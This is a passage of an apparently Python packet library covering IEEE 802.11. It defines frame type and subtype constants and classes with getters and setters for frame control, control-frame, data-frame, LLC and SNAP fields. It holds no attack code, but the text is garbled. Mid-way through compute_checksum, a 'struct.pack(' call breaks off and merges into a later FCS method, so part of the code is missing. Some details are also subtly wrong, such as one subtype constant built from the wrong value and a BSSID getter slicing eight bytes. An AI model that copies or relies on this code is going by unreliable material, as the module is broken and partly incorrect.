DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED1 = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_RESERVED1<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED2 = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_RESERVED2<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_BEACON = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_BEACON<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_ATIM = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_ATIM<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_DISASSOCIATION = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_DISASSOCIATION<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_AUTHENTICATION = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_AUTHENTICATION<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_DEAUTHENTICATION = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_DEAUTHENTICATION<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_ACTION = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_ACTION<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED3 = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_RESERVED3<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED4 = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_RESERVED4<<2 # Control Types/SubTypes DOT11_TYPE_CONTROL = int("01",2) DOT11_SUBTYPE_CONTROL_RESERVED1 = int("0000",2) DOT11_SUBTYPE_CONTROL_RESERVED2 = int("0001",2) DOT11_SUBTYPE_CONTROL_RESERVED3 = int("0010",2) DOT11_SUBTYPE_CONTROL_RESERVED4 = int("0011",2) DOT11_SUBTYPE_CONTROL_RESERVED5 = int("0100",2) DOT11_SUBTYPE_CONTROL_RESERVED6 = int("0101",2) DOT11_SUBTYPE_CONTROL_RESERVED7 = int("0110",2) DOT11_SUBTYPE_CONTROL_RESERVED8 = int("0111",2) DOT11_SUBTYPE_CONTROL_BLOCK_ACK_REQUEST = int("1000",2) DOT11_SUBTYPE_CONTROL_BLOCK_ACK = int("1001",2) DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL = int("1010",2) DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND = int("1011",2) DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND = int("1100",2) DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT = int("1101",2) DOT11_SUBTYPE_CONTROL_CF_END = int("1110",2) DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK = int("1111",2) DOT11_TYPE_CONTROL_SUBTYPE_RESERVED1 = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_RESERVED1<<2 DOT11_TYPE_CONTROL_SUBTYPE_RESERVED2 = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_RESERVED2<<2 DOT11_TYPE_CONTROL_SUBTYPE_RESERVED3 = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_RESERVED3<<2 DOT11_TYPE_CONTROL_SUBTYPE_RESERVED4 = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_RESERVED4<<2 DOT11_TYPE_CONTROL_SUBTYPE_RESERVED5 = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_RESERVED5<<2 DOT11_TYPE_CONTROL_SUBTYPE_RESERVED6 = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_RESERVED6<<2 DOT11_TYPE_CONTROL_SUBTYPE_RESERVED7 = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_RESERVED7<<2 DOT11_TYPE_CONTROL_SUBTYPE_BLOCK_ACK_REQUEST = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_BLOCK_ACK_REQUEST<<2 DOT11_TYPE_CONTROL_SUBTYPE_BLOCK_ACK = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_BLOCK_ACK<<2 DOT11_TYPE_CONTROL_SUBTYPE_POWERSAVE_POLL = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL<<2 DOT11_TYPE_CONTROL_SUBTYPE_REQUEST_TO_SEND = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND<<2 DOT11_TYPE_CONTROL_SUBTYPE_CLEAR_TO_SEND = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND<<2 DOT11_TYPE_CONTROL_SUBTYPE_ACKNOWLEDGMENT = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT<<2 DOT11_TYPE_CONTROL_SUBTYPE_CF_END = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_CF_END<<2 DOT11_TYPE_CONTROL_SUBTYPE_CF_END_CF_ACK = \ DOT11_TYPE_CONTROL|DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK<<2 # Data Types/SubTypes DOT11_TYPE_DATA = int("10",2) DOT11_SUBTYPE_DATA = int("0000",2) DOT11_SUBTYPE_DATA_CF_ACK = int("0001",2) DOT11_SUBTYPE_DATA_CF_POLL = int("0010",2) DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL = int("0011",2) DOT11_SUBTYPE_DATA_NULL_NO_DATA = int("0100",2) DOT11_SUBTYPE_DATA_CF_ACK_NO_DATA = int("0101",2) DOT11_SUBTYPE_DATA_CF_POLL_NO_DATA = int("0110",2) DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL_NO_DATA = int("0111",2) DOT11_SUBTYPE_DATA_QOS_DATA = int("1000",2) DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK = int("1001",2) DOT11_SUBTYPE_DATA_QOS_DATA_CF_POLL = int("1010",2) DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK_CF_POLL = int("1011",2) DOT11_SUBTYPE_DATA_QOS_NULL_NO_DATA = int("1100",2) DOT11_SUBTYPE_DATA_RESERVED1 = int("1101",2) DOT11_SUBTYPE_DATA_QOS_CF_POLL_NO_DATA = int("1110",2) DOT11_SUBTYPE_DATA_QOS_CF_ACK_CF_POLL_NO_DATA = int("1111",2) DOT11_TYPE_DATA_SUBTYPE_DATA = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA<<2 DOT11_TYPE_DATA_SUBTYPE_CF_ACK = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_CF_ACK<<2 DOT11_TYPE_DATA_SUBTYPE_CF_POLL = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_CF_POLL<<2 DOT11_TYPE_DATA_SUBTYPE_CF_ACK_CF_POLL = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL<<2 DOT11_TYPE_DATA_SUBTYPE_NULL_NO_DATA = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_NULL_NO_DATA<<2 DOT11_TYPE_DATA_SUBTYPE_CF_ACK_NO_DATA = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_CF_POLL_NO_DATA<<2 DOT11_TYPE_DATA_SUBTYPE_CF_ACK_CF_POLL_NO_DATA = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL_NO_DATA<<2 DOT11_TYPE_DATA_SUBTYPE_QOS_DATA = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_QOS_DATA<<2 DOT11_TYPE_DATA_SUBTYPE_QOS_DATA_CF_ACK = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK<<2 DOT11_TYPE_DATA_SUBTYPE_QOS_DATA_CF_POLL = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_QOS_DATA_CF_POLL<<2 DOT11_TYPE_DATA_SUBTYPE_QOS_DATA_CF_ACK_CF_POLL = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK_CF_POLL<<2 DOT11_TYPE_DATA_SUBTYPE_QOS_NULL_NO_DATA = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_QOS_NULL_NO_DATA<<2 DOT11_TYPE_DATA_SUBTYPE_RESERVED1 = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_RESERVED1<<2 DOT11_TYPE_DATA_SUBTYPE_QOS_CF_POLL_NO_DATA = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_QOS_CF_POLL_NO_DATA<<2 DOT11_TYPE_DATA_SUBTYPE_QOS_CF_ACK_CF_POLL_NO_DATA = \ DOT11_TYPE_DATA|DOT11_SUBTYPE_DATA_QOS_CF_ACK_CF_POLL_NO_DATA<<2 # Reserved Types/SubTypes DOT11_TYPE_RESERVED = int("11",2) DOT11_SUBTYPE_RESERVED_RESERVED1 = int("0000",2) DOT11_SUBTYPE_RESERVED_RESERVED2 = int("0001",2) DOT11_SUBTYPE_RESERVED_RESERVED3 = int("0010",2) DOT11_SUBTYPE_RESERVED_RESERVED4 = int("0011",2) DOT11_SUBTYPE_RESERVED_RESERVED5 = int("0100",2) DOT11_SUBTYPE_RESERVED_RESERVED6 = int("0101",2) DOT11_SUBTYPE_RESERVED_RESERVED7 = int("0110",2) DOT11_SUBTYPE_RESERVED_RESERVED8 = int("0111",2) DOT11_SUBTYPE_RESERVED_RESERVED9 = int("1000",2) DOT11_SUBTYPE_RESERVED_RESERVED10 = int("1001",2) DOT11_SUBTYPE_RESERVED_RESERVED11 = int("1010",2) DOT11_SUBTYPE_RESERVED_RESERVED12 = int("1011",2) DOT11_SUBTYPE_RESERVED_RESERVED13 = int("1100",2) DOT11_SUBTYPE_RESERVED_RESERVED14 = int("1101",2) DOT11_SUBTYPE_RESERVED_RESERVED15 = int("1110",2) DOT11_SUBTYPE_RESERVED_RESERVED16 = int("1111",2) DOT11_TYPE_RESERVED_SUBTYPE_RESERVED1 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED1<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED2 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED2<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED3 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED3<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED4 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED4<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED5 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED5<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED6 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED6<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED7 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED7<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED8 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED8<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED9 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED9<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED10 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED10<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED11 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED11<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED12 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED12<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED13 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED13<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED14 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED14<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED15 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED15<<2 DOT11_TYPE_RESERVED_SUBTYPE_RESERVED16 = \ DOT11_TYPE_RESERVED|DOT11_SUBTYPE_RESERVED_RESERVED16<<2 class Dot11(ProtocolPacket): def __init__(self, aBuffer = None, FCS_at_end = True): header_size = 2 self.__FCS_at_end=not not FCS_at_end # Is Boolean if self.__FCS_at_end: tail_size = 4 else: tail_size = 0 ProtocolPacket.__init__(self, header_size,tail_size) if(aBuffer): self.load_packet(aBuffer) def get_order(self): "Return 802.11 frame 'Order' field" b = self.header.get_byte(1) return ((b >> 7) & 0x01) def set_order(self, value): "Set 802.11 frame 'Order' field" # clear the bits mask = (~0x80) & 0xFF masked = self.header.get_byte(1) & mask # set the bits nb = masked | ((value & 0x01) << 7) self.header.set_byte(1, nb) def get_protectedFrame(self): "Return 802.11 frame 'Protected' field" b = self.header.get_byte(1) return ((b >> 6) & 0x01) def set_protectedFrame(self, value): "Set 802.11 frame 'Protected Frame' field" # clear the bits mask = (~0x40) & 0xFF masked = self.header.get_byte(1) & mask # set the bits nb = masked | ((value & 0x01) << 6) self.header.set_byte(1, nb) def get_moreData(self): "Return 802.11 frame 'More Data' field" b = self.header.get_byte(1) return ((b >> 5) & 0x01) def set_moreData(self, value): "Set 802.11 frame 'More Data' field" # clear the bits mask = (~0x20) & 0xFF masked = self.header.get_byte(1) & mask # set the bits nb = masked | ((value & 0x01) << 5) self.header.set_byte(1, nb) def get_powerManagement(self): "Return 802.11 frame 'Power Management' field" b = self.header.get_byte(1) return ((b >> 4) & 0x01) def set_powerManagement(self, value): "Set 802.11 frame 'Power Management' field" # clear the bits mask = (~0x10) & 0xFF masked = self.header.get_byte(1) & mask # set the bits nb = masked | ((value & 0x01) << 4) self.header.set_byte(1, nb) def get_retry(self): "Return 802.11 frame 'Retry' field" b = self.header.get_byte(1) return ((b >> 3) & 0x01) def set_retry(self, value): "Set 802.11 frame 'Retry' field" # clear the bits mask = (~0x08) & 0xFF masked = self.header.get_byte(1) & mask # set the bits nb = masked | ((value & 0x01) << 3) self.header.set_byte(1, nb) def get_moreFrag(self): "Return 802.11 frame 'More Fragments' field" b = self.header.get_byte(1) return ((b >> 2) & 0x01) def set_moreFrag(self, value): "Set 802.11 frame 'More Fragments' field" # clear the bits mask = (~0x04) & 0xFF masked = self.header.get_byte(1) & mask # set the bits nb = masked | ((value & 0x01) << 2) self.header.set_byte(1, nb) def get_fromDS(self): "Return 802.11 frame 'from DS' field" b = self.header.get_byte(1) return ((b >> 1) & 0x01) def set_fromDS(self, value): "Set 802.11 frame 'from DS' field" # clear the bits mask = (~0x02) & 0xFF masked = self.header.get_byte(1) & mask # set the bits nb = masked | ((value & 0x01) << 1) self.header.set_byte(1, nb) def get_toDS(self): "Return 802.11 frame 'to DS' field" b = self.header.get_byte(1) return (b & 0x01) def set_toDS(self, value): "Set 802.11 frame 'to DS' field" # clear the bits mask = (~0x01) & 0xFF masked = self.header.get_byte(1) & mask # set the bits nb = masked | (value & 0x01) self.header.set_byte(1, nb) def get_subtype(self): "Return 802.11 frame 'subtype' field" b = self.header.get_byte(0) return ((b >> 4) & 0x0F) def set_subtype(self, value): "Set 802.11 frame 'subtype' field" # clear the bits mask = (~0xF0)&0xFF masked = self.header.get_byte(0) & mask # set the bits nb = masked | ((value << 4) & 0xF0) self.header.set_byte(0, nb) def get_type(self): "Return 802.11 frame 'type' field" b = self.header.get_byte(0) return ((b >> 2) & 0x03) def set_type(self, value): "Set 802.11 frame 'type' field" # clear the bits mask = (~0x0C)&0xFF masked = self.header.get_byte(0) & mask # set the bits nb = masked | ((value << 2) & 0x0C) self.header.set_byte(0, nb) def get_type_n_subtype(self): "Return 802.11 frame 'Type and Subtype' field" b = self.header.get_byte(0) return ((b >> 2) & 0x3F) def set_type_n_subtype(self, value): "Set 802.11 frame 'Type and Subtype' field" # clear the bits mask = (~0xFC)&0xFF masked = self.header.get_byte(0) & mask # set the bits nb = masked | ((value << 2) & 0xFC) self.header.set_byte(0, nb) def get_version(self): "Return 802.11 frame control 'Protocol version' field" b = self.header.get_byte(0) return (b & 0x03) def set_version(self, value): "Set the 802.11 frame control 'Protocol version' field" # clear the bits mask = (~0x03)&0xFF masked = self.header.get_byte(0) & mask # set the bits nb = masked | (value & 0x03) self.header.set_byte(0, nb) def compute_checksum(self,bytes): crcle=crc32(bytes)&0xffffffffL # ggrr this crc32 is in little endian, convert it to big endian crc=struct.pack('") return b def set_fcs(self, value = None): "Set the 802.11 CTS control frame 'FCS' field. If value is None, is auto_checksum" if not self.__FCS_at_end: return # calculate the FCS if value is None: payload = self.get_body_as_string() crc32=self.compute_checksum(payload) value=crc32 # set the bits nb = value & 0xFFFFFFFF self.tail.set_long(-4, nb) class Dot11ControlFrameCTS(ProtocolPacket): "802.11 Clear-To-Send Control Frame" def __init__(self, aBuffer = None): header_size = 8 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_duration(self): "Return 802.11 CTS control frame 'Duration' field" b = self.header.get_word(0, "<") return b def set_duration(self, value): "Set the 802.11 CTS control frame 'Duration' field" # set the bits nb = value & 0xFFFF self.header.set_word(0, nb, "<") def get_ra(self): "Return 802.11 CTS control frame 48 bit 'Receiver Address' field as a 6 bytes array" return self.header.get_bytes()[2:8] def set_ra(self, value): "Set 802.11 CTS control frame 48 bit 'Receiver Address' field as a 6 bytes array" for i in range(0, 6): self.header.set_byte(2+i, value[i]) class Dot11ControlFrameACK(ProtocolPacket): "802.11 Acknowledgement Control Frame" def __init__(self, aBuffer = None): header_size = 8 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_duration(self): "Return 802.11 ACK control frame 'Duration' field" b = self.header.get_word(0, "<") return b def set_duration(self, value): "Set the 802.11 ACK control frame 'Duration' field" # set the bits nb = value & 0xFFFF self.header.set_word(0, nb, "<") def get_ra(self): "Return 802.11 ACK control frame 48 bit 'Receiver Address' field as a 6 bytes array" return self.header.get_bytes()[2:8] def set_ra(self, value): "Set 802.11 ACK control frame 48 bit 'Receiver Address' field as a 6 bytes array" for i in range(0, 6): self.header.set_byte(2+i, value[i]) class Dot11ControlFrameRTS(ProtocolPacket): "802.11 Request-To-Send Control Frame" def __init__(self, aBuffer = None): header_size = 14 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_duration(self): "Return 802.11 RTS control frame 'Duration' field" b = self.header.get_word(0, "<") return b def set_duration(self, value): "Set the 802.11 RTS control frame 'Duration' field" # set the bits nb = value & 0xFFFF self.header.set_word(0, nb, "<") def get_ra(self): "Return 802.11 RTS control frame 48 bit 'Receiver Address' field as a 6 bytes array" return self.header.get_bytes()[2:8] def set_ra(self, value): "Set 802.11 RTS control frame 48 bit 'Receiver Address' field as a 6 bytes array" for i in range(0, 6): self.header.set_byte(2+i, value[i]) def get_ta(self): "Return 802.11 RTS control frame 48 bit 'Transmitter Address' field as a 6 bytes array" return self.header.get_bytes()[8:14] def set_ta(self, value): "Set 802.11 RTS control frame 48 bit 'Transmitter Address' field as a 6 bytes array" for i in range(0, 6): self.header.set_byte(8+i, value[i]) class Dot11ControlFramePSPoll(ProtocolPacket): "802.11 Power-Save Poll Control Frame" def __init__(self, aBuffer = None): header_size = 14 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_aid(self): "Return 802.11 PSPoll control frame 'AID' field" # the spec says "The AID value always has its two MSBs each set to 1." # TODO: Should we do check/modify it? Wireshark shows the only MSB to 0 b = self.header.get_word(0, "<") return b def set_aid(self, value): "Set the 802.11 PSPoll control frame 'AID' field" # set the bits nb = value & 0xFFFF # the spec says "The AID value always has its two MSBs each set to 1." # TODO: Should we do check/modify it? Wireshark shows the only MSB to 0 self.header.set_word(0, nb, "<") def get_bssid(self): "Return 802.11 PSPoll control frame 48 bit 'BSS ID' field as a 6 bytes array" return self.header.get_bytes()[2:8] def set_bssid(self, value): "Set 802.11 PSPoll control frame 48 bit 'BSS ID' field as a 6 bytes array" for i in range(0, 6): self.header.set_byte(2+i, value[i]) def get_ta(self): "Return 802.11 PSPoll control frame 48 bit 'Transmitter Address' field as a 6 bytes array" return self.header.get_bytes()[8:14] def set_ta(self, value): "Set 802.11 PSPoll control frame 48 bit 'Transmitter Address' field as a 6 bytes array" for i in range(0, 6): self.header.set_byte(8+i, value[i]) class Dot11ControlFrameCFEnd(ProtocolPacket): "802.11 'Contention Free End' Control Frame" def __init__(self, aBuffer = None): header_size = 14 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_duration(self): "Return 802.11 CF-End control frame 'Duration' field" b = self.header.get_word(0, "<") return b def set_duration(self, value): "Set the 802.11 CF-End control frame 'Duration' field" # set the bits nb = value & 0xFFFF self.header.set_word(0, nb, "<") def get_ra(self): "Return 802.11 CF-End control frame 48 bit 'Receiver Address' field as a 6 bytes array" return self.header.get_bytes()[2:8] def set_ra(self, value): "Set 802.11 CF-End control frame 48 bit 'Receiver Address' field as a 6 bytes array" for i in range(0, 6): self.header.set_byte(2+i, value[i]) def get_bssid(self): "Return 802.11 CF-End control frame 48 bit 'BSS ID' field as a 6 bytes array" return self.header.get_bytes()[8:14] def set_bssid(self, value): "Set 802.11 CF-End control frame 48 bit 'BSS ID' field as a 6 bytes array" for i in range(0, 6): self.header.set_byte(8+i, value[i]) class Dot11ControlFrameCFEndCFACK(ProtocolPacket): '802.11 \'CF-End + CF-ACK\' Control Frame' def __init__(self, aBuffer = None): header_size = 14 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_duration(self): 'Return 802.11 \'CF-End+CF-ACK\' control frame \'Duration\' field' b = self.header.get_word(0, "<") return b def set_duration(self, value): 'Set the 802.11 \'CF-End+CF-ACK\' control frame \'Duration\' field' # set the bits nb = value & 0xFFFF self.header.set_word(0, nb, "<") def get_ra(self): 'Return 802.11 \'CF-End+CF-ACK\' control frame 48 bit \'Receiver Address\' field as a 6 bytes array' return self.header.get_bytes()[2:8] def set_ra(self, value): 'Set 802.11 \'CF-End+CF-ACK\' control frame 48 bit \'Receiver Address\' field as a 6 bytes array' for i in range(0, 6): self.header.set_byte(2+i, value[i]) def get_bssid(self): 'Return 802.11 \'CF-End+CF-ACK\' control frame 48 bit \'BSS ID\' field as a 6 bytes array' return self.header.get_bytes()[8:16] def set_bssid(self, value): 'Set 802.11 \'CF-End+CF-ACK\' control frame 48 bit \'BSS ID\' field as a 6 bytes array' for i in range(0, 6): self.header.set_byte(8+i, value[i]) class Dot11DataFrame(ProtocolPacket): '802.11 Data Frame' def __init__(self, aBuffer = None): header_size = 22 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_duration(self): 'Return 802.11 \'Data\' data frame \'Duration\' field' b = self.header.get_word(0, "<") return b def set_duration(self, value): 'Set the 802.11 \'Data\' data frame \'Duration\' field' # set the bits nb = value & 0xFFFF self.header.set_word(0, nb, "<") def get_address1(self): 'Return 802.11 \'Data\' data frame 48 bit \'Address1\' field as a 6 bytes array' return self.header.get_bytes()[2:8] def set_address1(self, value): 'Set 802.11 \'Data\' data frame 48 bit \'Address1\' field as a 6 bytes array' for i in range(0, 6): self.header.set_byte(2+i, value[i]) def get_address2(self): 'Return 802.11 \'Data\' data frame 48 bit \'Address2\' field as a 6 bytes array' return self.header.get_bytes()[8:14] def set_address2(self, value): 'Set 802.11 \'Data\' data frame 48 bit \'Address2\' field as a 6 bytes array' for i in range(0, 6): self.header.set_byte(8+i, value[i]) def get_address3(self): 'Return 802.11 \'Data\' data frame 48 bit \'Address3\' field as a 6 bytes array' return self.header.get_bytes()[14: 20] def set_address3(self, value): 'Set 802.11 \'Data\' data frame 48 bit \'Address3\' field as a 6 bytes array' for i in range(0, 6): self.header.set_byte(14+i, value[i]) def get_sequence_control(self): 'Return 802.11 \'Data\' data frame \'Sequence Control\' field' b = self.header.get_word(20, "<") return b def set_sequence_control(self, value): 'Set the 802.11 \'Data\' data frame \'Sequence Control\' field' # set the bits nb = value & 0xFFFF self.header.set_word(20, nb, "<") def get_fragment_number(self): 'Return 802.11 \'Data\' data frame \'Fragment Number\' subfield' b = self.header.get_word(20, "<") return (b&0x000F) def set_fragment_number(self, value): 'Set the 802.11 \'Data\' data frame \'Fragment Number\' subfield' # clear the bits mask = (~0x000F) & 0xFFFF masked = self.header.get_word(20, "<") & mask # set the bits nb = masked | (value & 0x000F) self.header.set_word(20, nb, "<") def get_sequence_number(self): 'Return 802.11 \'Data\' data frame \'Sequence Number\' subfield' b = self.header.get_word(20, "<") return ((b>>4) & 0xFFF) def set_sequence_number(self, value): 'Set the 802.11 \'Data\' data frame \'Sequence Number\' subfield' # clear the bits mask = (~0xFFF0) & 0xFFFF masked = self.header.get_word(20, "<") & mask # set the bits nb = masked | ((value & 0x0FFF ) << 4 ) self.header.set_word(20, nb, "<") def get_frame_body(self): 'Return 802.11 \'Data\' data frame \'Frame Body\' field' return self.get_body_as_string() def set_frame_body(self, data): 'Set 802.11 \'Data\' data frame \'Frame Body\' field' self.load_body(data) class Dot11DataQoSFrame(Dot11DataFrame): '802.11 Data QoS Frame' def __init__(self, aBuffer = None): header_size = 24 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_QoS(self): 'Return 802.11 \'Data\' data frame \'QoS\' field' b = self.header.get_word(22, "<") return b def set_QoS(self, value): 'Set the 802.11 \'Data\' data frame \'QoS\' field' # set the bits nb = value & 0xFFFF self.header.set_word(22, nb, "<") class Dot11DataAddr4Frame(Dot11DataFrame): '802.11 Data With ToDS From DS Flags (With Addr 4) Frame' def __init__(self, aBuffer = None): header_size = 28 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_address4(self): 'Return 802.11 \'Data\' data frame 48 bit \'Address4\' field as a 6 bytes array' return self.header.get_bytes()[22:28] def set_address4(self, value): 'Set 802.11 \'Data\' data frame 48 bit \'Address4\' field as a 6 bytes array' for i in range(0, 6): self.header.set_byte(22+i, value[i]) class Dot11DataAddr4QoSFrame(Dot11DataAddr4Frame): '802.11 Data With ToDS From DS Flags (With Addr 4) and QoS Frame' def __init__(self, aBuffer = None): header_size = 30 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_QoS(self): 'Return 802.11 \'Data\' data frame \'QoS\' field' b = self.header.get_word(28, "<") return b def set_QoS(self, value): 'Set the 802.11 \'Data\' data frame \'QoS\' field' # set the bits nb = value & 0xFFFF self.header.set_word(28, nb, "<") class SAPTypes(): NULL = 0x00 LLC_SLMGMT = 0x02 SNA_PATHCTRL = 0x04 IP = 0x06 SNA1 = 0x08 SNA2 = 0x0C PROWAY_NM_INIT = 0x0E NETWARE1 = 0x10 OSINL1 = 0x14 TI = 0x18 OSINL2 = 0x20 OSINL3 = 0x34 SNA3 = 0x40 BPDU = 0x42 RS511 = 0x4E OSINL4 = 0x54 X25 = 0x7E XNS = 0x80 BACNET = 0x82 NESTAR = 0x86 PROWAY_ASLM = 0x8E ARP = 0x98 SNAP = 0xAA HPJD = 0xB4 VINES1 = 0xBA VINES2 = 0xBC NETWARE2 = 0xE0 NETBIOS = 0xF0 IBMNM = 0xF4 HPEXT = 0xF8 UB = 0xFA RPL = 0xFC OSINL5 = 0xFE GLOBAL = 0xFF class LLC(ProtocolPacket): '802.2 Logical Link Control (LLC) Frame' DLC_UNNUMBERED_FRAMES = 0x03 def __init__(self, aBuffer = None): header_size = 3 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_DSAP(self): "Get the Destination Service Access Point (SAP) from LLC frame" return self.header.get_byte(0) def set_DSAP(self, value): "Set the Destination Service Access Point (SAP) of LLC frame" self.header.set_byte(0, value) def get_SSAP(self): "Get the Source Service Access Point (SAP) from LLC frame" return self.header.get_byte(1) def set_SSAP(self, value): "Set the Source Service Access Point (SAP) of LLC frame" self.header.set_byte(1, value) def get_control(self): "Get the Control field from LLC frame" return self.header.get_byte(2) def set_control(self, value): "Set the Control field of LLC frame" self.header.set_byte(2, value) class SNAP(ProtocolPacket): '802.2 SubNetwork Access Protocol (SNAP) Frame' def __init__(self, aBuffer = None): header_size = 5 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_OUI(self): "Get the three-octet Organizationally Unique Identifier (OUI) SNAP frame" b=self.header.get_bytes()[0:3].tostring() #unpack requires a string argument of length 4 and b is 3 bytes long (oui,)=struct.unpack('!L', '\x00'+b) return oui def set_OUI(self, value): "Set the three-octet Organizationally Unique Identifier (OUI) SNAP frame" # clear the bits mask = ((~0xFFFFFF00) & 0xFF) masked = self.header.get_long(0, ">") & mask # set the bits nb = 